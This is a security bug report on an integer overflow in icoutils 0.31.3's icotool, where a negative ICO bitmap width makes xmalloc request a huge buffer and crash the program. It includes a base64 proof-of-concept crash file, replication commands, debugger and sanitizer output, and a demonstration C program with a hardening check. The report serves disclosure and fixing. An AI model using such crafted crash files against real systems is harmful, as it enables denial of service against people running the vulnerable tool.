Package: icoutils
Version: 0.31.3
Tags: security upstream

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.3
Release Status: release
Author: Jerzy Kramarz
Description:

An integer overflow was observed in the extract_icons function in extract.c. A corrupted ICO file can carry a negative bitmap width, which reaches the allocation at extract.c:319, row = xmalloc(width * 4), unchecked. The negative int product is converted from signed to unsigned when it is passed to xmalloc(size_t), so the call requests an enormous buffer: the sanitizer below reports 0xffffffff80000004 bytes, valgrind shows the same value as the signed argument -2147483644, which corresponds to width = -536870911. malloc fails, xmalloc reports "memory exhausted" and icotool aborts. The issue is triggered simply by processing a corrupted ICO file (here with icotool -l) and results in an icotool crash, i.e. a denial of service.

GDB session:

Breakpoint 1 at 0x4092b0: file xmalloc.c, line 39.
(gdb) r
Starting program: /home/icoutils/clean/icoutils-0.31.3/icotool/icotool -l PoC.ico

Breakpoint 1, xmalloc (n=48) at xmalloc.c:40
40      {
(gdb) p n
$1 = 48
(gdb) bt
#0  xmalloc (n=48) at xmalloc.c:40
#1  0x0000000000403c0e in extract_icons (in=0x30, inname=0x1 <error: Cannot access memory at address 0x1>, listmode=6, listmode@entry=true, outfile_gen=0x30001, outfile_gen@entry=0x0, filter=0x1000, filter@entry=0x404f70 <filter>) at extract.c:122
#2  0x0000000000402422 in main (argc=3, argv=0x76e44fccaa78) at main.c:321
(gdb) c
Continuing.
output/M1/crashes.2017-03-22-10:58:51/id:000002,sig:06,src:000101,op:arith8,pos:61,val:-32: reserved is not zero

Breakpoint 1, xmalloc (n=64) at xmalloc.c:40
40      {
(gdb) c
Continuing.
output/M1/crashes.2017-03-22-10:58:51/id:000002,sig:06,src:000101,op:arith8,pos:61,val:-32: incorrect total size of bitmap (296 specified; 616 real)

Breakpoint 1, xmalloc (n=256) at xmalloc.c:40
40      {
(gdb) c
Continuing.

Breakpoint 1, xmalloc (n=256) at xmalloc.c:40
40      {
(gdb) c
Continuing.

Breakpoint 1, xmalloc (n=18446744071562067972) at xmalloc.c:40
40      {
(gdb) c
Continuing.
/home/icoutils/clean/icoutils-0.31.3/icotool/icotool: memory exhausted
[Inferior 1 (process 22200) exited with code 01]

Affected code (icotool/extract.c):

316         png_write_info(png_ptr, info_ptr);
317     }
318
319     row = xmalloc(width * 4);
320
321     for (d = 0; d < (uint32_t) height; d++) {
322         uint32_t x;

PoC file (base64):

AAABAAMAEBAQAAEABAAoAQAANgAAABAQAAABAAgAaAUAAP//AP///wD///8A////Af///wD/KAAA
AAEAAOCAAAAAAQAEAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAP//ewD/AAAAAP8AAP//////////
///3/4////////+P/////////3//////////j/////////+P////////d49///////////h/////
//////////j////4/////4/////////1+P//f///j/j/j//////////4////7////////////xr/
////////nlz7t3Qg/Zt4Zf2bIHT9W3Mg/VtuIP0TdXPwAXBy4ANsZeADIHfkB24g5gdld8MPZyD/
n2Ug//9vVv//biAoAAAAEAAAACAAAAABAAgAAAAAAEABAAAAAAAAAAAAAAAAAAAAAAAA////AP7+
/gDW1tYAqqqqAP39/QB5eXkAAAAAAHp6egD8/PwAQUFBAHV1dQCEhIQAHh4eAMvLZAC3t7cWAwMD
+fn5+fn5AIiIiAACAgIAgYGBAPb29gAgICAAtra2AIqKigAEBAQAGhoaAOfn5ucODg4AODg4AGtr
awAYGBgAsrKyAMHBwQAVFRYAFxcXAAsLCwAAAP8eHh7hAAAANAAAAAAAAAAAAAUAAAAAAAAAAAAA
AAEBAQAfHx8ACgoKAHBwcACbm5sA6enoAHh4eAAREREAIzEjAEREAOLi4gCmpqYAZWVlAGpqagAE
tLQAr6+vAM/PzwAICAgAbGxsAI+PjwCxsbEAv7+tAPHx8QBYWFgAmpqaAP///wD///8A///qAP//
/wAAAQAAgAD/AP///wD///8A////AP///wH///8A//8g/Zt4Zf2bIHT9W///AP///wD///8A////
Hv///wD///8A////AP///wD///8A////CP///wD///8A/+v/AP//8gD///8A////AP9+3wD///8A
////AP///wD///8A////AP///wD///8A/+H/AP///wD///8A////AP///wD///8A////AP///wD/
//8A////AP8AgAAAAAACAP//AP///wD///8A////AP///wD//wD///8A////AP////8A////AP//
/wD///8A////AP///wD///8W////AP///wD///0A////AP///wD///8A/93/AP///wD///8A////
AP//7wD///9A////AP///wD///8A////AP///wAAAP8AAAD/AAAA/wAAAHR0dHRsAP///wD///8A
////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD/
//8A////AP///wD///8gAAAAAP///wD///8A////AP///wD///8A////AP///wD///8A////AP//
/wD///8A////AP///wD///8A////AP///wD///8A////AP//fgAAAAkA/////wD///8A////AP//
/wD///8A////AP///wD///8A////AP////3///8A////AP///wD///8A/yj/AP///wD///8A////
AP///wD///8A////AP/g/wD/QP8A////AP///wD///8A////AP///wD///8A////AP///wD//xgB
////AP///wD///8A////AP///wD///8A//8fAf///wAAH/8A////AP///wD///8A///jAP///wD/
//8A////CP///wD///8A////AP///wD//+EA////AP///wD///8A////AP///wD///8A////AP//
/wD///8A/////////wD///8A////AP///wD/BgYGBgYGBgUGBgYGBgYGBgYGBgYGBgYGBgYG//8A
BgYGBgYGBgYGBgYGBgYGBgYAAABABgYGBg0GBjoGBgYGBgYGBgYaBgYGHAYGBgYGBgYGBgYGBgYG
BgMGBgYGBgYGBgYGBgYGHAZ1dXWKAAAABgYGBgYGBgYGBgYGBgYcBgYGBuUFBgYGBgaAAP8A////
BgYGBgYGBgoUBgUnBgYGBgYGBgYGBgYGBgYMBgYGBgYGBhsGBgZQBgYGHAYGBgYGBhQGCwYGBgYG
DAYGBgYGBgYGBgYLBgYKBgsGBgYF6AkHBgUGBgsGBgwGBgYGBgYGBgYGBgYGBQYGBgYGBgYGBgYG
BgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYG//+eXPu3dCD9m3hl/Zt///1bcyD9W24g/RN1c/8B
cH7gA2zcREREuwAAAAF6enoAAABl4AMgf+QHbiDmB2V3ww9nIP+fZSD//29u//9uICgAAAAQAAAA
IAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP91dXWKAAAAAAAAAACE
hIR7AAAAAAAAAAAAAP///wAADwAAAAAAAAAAAAAAAAAAAAAAAP////IAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAD/3gAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAH8AAAABAAAATr+/w0AA5f8OAAAAAFhY
WKcAAABlAAAAAAAAAAAAAAAAAAAAAAAAAAAAADD3bGxskwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD
AAAA/wAAAAEAAABLAAAA/6+vr1AAAAAAAADqAP///wD///8AgAD/AP///wD///8AAAEAAAD/AAAA
AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/AAAAAQAAAP8AAAAAampqAAAAAAAAAAsA
AAAAAACAAAAAAQDo//8AAAAAAAAAAAD+////AAAAAAAAAAAAAAAAAAAXAAAA/wAAAIcRERHuMiMj
3ERERLsAAAABenp6hQAAAP8AABsdAAAAAAAAgAAAHQAAAAAAAQAAAD4VFSzqFxcX6AICAv2KCwAA
AAAAAAAAAAAAAAAGAQAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAB0dHR0dHR0dP8YGBjn
AAAATQAAAAAAAAAAAAAAAAAAAAEAAAD/Dg4O8Tg4OMcAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8A
AAD/a2trlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/dXV1igAAAAAAAAAA/yAgIN8A
AABJioqKdQQEBPsAAAD/AAAA/wAAAP8AAAD/Ghoa5QAAAAAQAAAAAAAAAAAAAAAAAAAAAAAASAAA
AP8ABAAAAAAAewAEAAGIiIh3AgIC/QAAAP8AAAD/AAAA/4GBgWwAAAAJAAAAAAAAAAAAAAAAAAAA
AEFBQb4AAAD/AAAA/3V1dYoAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAP///+MAAAApAAAAmZmZmZmZ
mZmZmZmZmZkAAnl5eYYAAAD/AAAAhQAAAAMAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////
8QAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAA5AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA5H8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//nlz7
t3Qg/YV4Zf2bIHT9W3NuIP0TdXPwAXB+AXBy4ANsZeADIHfkB24g5ge1d8MPZyD/

To replicate this issue, save the base64 text above (line breaks are fine, base64 -d ignores them) and execute the following commands:

echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.3/icotool/icotool -l PoC.ico

ASAN Report (needs to be compiled with -fsanitize=address):

==18908==WARNING: AddressSanitizer failed to allocate 0xffffffff80000004 bytes
==18908==AddressSanitizer's allocator is terminating the process instead of returning 0
==18908==If you don't like this behavior set allocator_may_return_null=1
==18908==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0)
    #0 0x6c904b791ba3 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x59ba3)
    #1 0x6c904b795ae3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5dae3)
    #2 0x6c904b7517c3 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x197c3)
    #3 0x6c904b794341 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5c341)
    #4 0x6c904b78c6f0 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x546f0)
    #5 0x43abc0 in xmalloc /home/icoutils/icoutils-0.31.3/lib/xmalloc.c:41
    #6 0x40ff22 in extract_icons /home/icoutils/icoutils-0.31.3/icotool/extract.c:319
    #7 0x403fb9 in main /home/icoutils/icoutils-0.31.3/icotool/main.c:321
    #8 0x6c904ac6bb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #9 0x404ea5 (/home/icoutils/icoutils-0.31.3/icotool/icotool+0x404ea5)

Valgrind Output:

==30257== Memcheck, a memory error detector
==30257== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==30257== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==30257== Command: ./clean/icoutils-0.31.3/icotool/icotool -l PoC.ico
==30257==
PoC.ico: reserved is not zero
PoC.ico: incorrect total size of bitmap (296 specified; 616 real)
==30257== Argument 'size' of function malloc has a fishy (possibly negative) value: -2147483644
==30257==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==30257==    by 0x4092B8: xmalloc (xmalloc.c:41)
==30257==    by 0x404682: extract_icons (extract.c:319)
==30257==    by 0x402421: main (main.c:321)
==30257==
./clean/icoutils-0.31.3/icotool/icotool: memory exhausted
==30257==
==30257== HEAP SUMMARY:
==30257==     in use at exit: 1,299 bytes in 7 blocks
==30257==   total heap usage: 53 allocs, 46 frees, 10,866 bytes allocated
==30257==
==30257== LEAK SUMMARY:
==30257==    definitely lost: 0 bytes in 0 blocks
==30257==    indirectly lost: 0 bytes in 0 blocks
==30257==      possibly lost: 0 bytes in 0 blocks
==30257==    still reachable: 1,299 bytes in 7 blocks
==30257==         suppressed: 0 bytes in 0 blocks
==30257== Rerun with --leak-check=full to see details of leaked memory
==30257==
==30257== For counts of detected and suppressed errors, rerun with: -v
==30257== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
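Added example (editor's note, not code from this report or from icoutils): the program below reproduces the arithmetic behind extract.c:319 on a constructed BITMAPINFOHEADER fragment whose biWidth field is 0xE0000001, the width implied by the valgrind value above (-2147483644 / 4 = -536870911), and places a bounds check beside it of the kind a fixed extract_icons needs before calling xmalloc. The header bytes are constructed for the demonstration, not copied from the PoC file, and the function names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Read a little-endian signed 32-bit field, as a BITMAPINFOHEADER parser
 * reads biWidth. The cast relies on two's complement, as icotool does. */
static int32_t le32(const uint8_t *p)
{
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* Mirrors the size computation at extract.c:319 in icoutils 0.31.3:
 *     row = xmalloc(width * 4);
 * width is a signed 32-bit value; the int product is converted to size_t
 * at the call, so a negative width becomes a huge request. For
 * |width| >= 2^29 the multiplication itself also overflows int. */
size_t buggy_row_size(int32_t width)
{
    int n = width * 4;      /* -536870911 * 4 == -2147483644 */
    return (size_t)n;       /* 0xffffffff80000004 with a 64-bit size_t */
}

/* Hardened replacement: a bitmap row must have a positive width and the
 * byte count must fit in size_t. Returns 1 and stores the size in *out on
 * success, 0 when the header value must be rejected. */
int checked_row_size(int32_t width, size_t *out)
{
    if (width <= 0)
        return 0;
    size_t w = (size_t)width;
    if (w > SIZE_MAX / 4)
        return 0;
    *out = w * 4;
    return 1;
}

/* Convenience wrapper for callers that treat 0 as "rejected". */
size_t checked_row_size_or_zero(int32_t width)
{
    size_t n;
    return checked_row_size(width, &n) ? n : 0;
}

/* Constructed BITMAPINFOHEADER prefix (hypothetical bytes, not from the
 * PoC): biSize = 40, biWidth = 0xE0000001, biHeight = 16, 32 bpp. */
static const uint8_t demo_header[16] = {
    0x28, 0x00, 0x00, 0x00,   /* biSize = 40 */
    0x01, 0x00, 0x00, 0xE0,   /* biWidth = 0xE0000001 = -536870911 */
    0x10, 0x00, 0x00, 0x00,   /* biHeight = 16 */
    0x01, 0x00, 0x20, 0x00,   /* biPlanes = 1, biBitCount = 32 */
};

int32_t demo_width(void)
{
    return le32(demo_header + 4);
}

int main(void)
{
    int32_t width = demo_width();
    size_t n;

    printf("biWidth = %d\n", width);
    printf("width * 4 as size_t = 0x%zx\n", buggy_row_size(width));
    if (checked_row_size(width, &n))
        printf("checked: %zu bytes\n", n);
    else
        printf("checked: rejected\n");
    return 0;
}
```

The check belongs before the multiplication, not after it: once width * 4 has been evaluated as int, a negative or wrapped result carries no information about the original field, and the conversion to size_t hides the sign entirely. Rejecting non-positive widths also covers the variant where the product overflows int.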